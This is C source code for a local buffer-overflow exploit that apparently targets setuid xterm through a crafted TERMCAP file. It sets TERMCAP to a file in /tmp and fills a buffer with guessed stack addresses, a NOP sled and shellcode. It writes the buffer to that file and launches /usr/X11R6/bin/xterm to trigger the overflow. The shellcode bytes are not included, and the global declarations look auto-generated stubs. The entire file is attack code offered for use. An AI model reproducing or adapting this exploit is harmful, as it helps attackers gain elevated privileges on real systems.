
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int DEFAULT_BUFSIZE ;
 int O_CREAT ;
 int O_TRUNC ;
 int O_WRONLY ;
 int atoi (char*) ;
 int close (int) ;
 char* entry1 ;
 int execl (char*,char*,int ) ;
 int exit (int ) ;
 int filename ;
 int get_sp () ;
 char* malloc (int) ;
 int open (int ,int,int) ;
 int printf (char*,...) ;
 int setenv (char*,char*,int) ;
 char* shellcode ;
 int snprintf (char*,int ,char*,char*,char*) ;
 int strlen (char*) ;
 int write (int,char*,int) ;

int main(int argc, char *argv[]) {
   int bufsize, offset, i, fd;
   long *bufptr;
   char *ptr, *buffer, *tempbuf;

   setenv("TERMCAP", "/tmp/lstermcap", 1);


   bufsize=DEFAULT_BUFSIZE;

   if (argc > 2) bufsize=atoi(argv[2]);
   if (argc > 1) offset=atoi(argv[1]);
   else offset=300;


   printf("bufsize: %i\noffset: %i\n", bufsize,offset);

   if(!(buffer = malloc(bufsize))) {
      printf("can't allocate enough memory\n");
      exit(0);
   }
  if(!(tempbuf = malloc(bufsize+strlen(entry1) ))) {
      printf("can't allocate enough memory\n");
      exit(0);
   }

   printf("get_sp(): 0x%x\n", get_sp());
   printf("get_sp()-offs: 0x%x\n", (get_sp()-offset) );

   ptr=buffer;
   bufptr = (long *)(buffer+2);

   for (i = 0; i < bufsize; i += 4)
       *(bufptr++) = (get_sp()-offset);

    for (i = 0; i < (bufsize/2); i++)
        buffer[i] = 0x90;

 ptr=buffer + ((bufsize/2) - strlen(shellcode)/2);
   for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];


   ptr=ptr+24;


   *(ptr++)=0x3a;
   *(ptr++)=0x5c;


    snprintf(tempbuf, (bufsize+strlen(entry1)), "%s%s%s", entry1, buffer);
    fd = open(filename, O_WRONLY|O_CREAT|O_TRUNC, 0666);
    write (fd, tempbuf, strlen(tempbuf));
    close(fd);
 printf("made termcap\n");

 execl("/usr/X11R6/bin/xterm","xterm", 0);

}
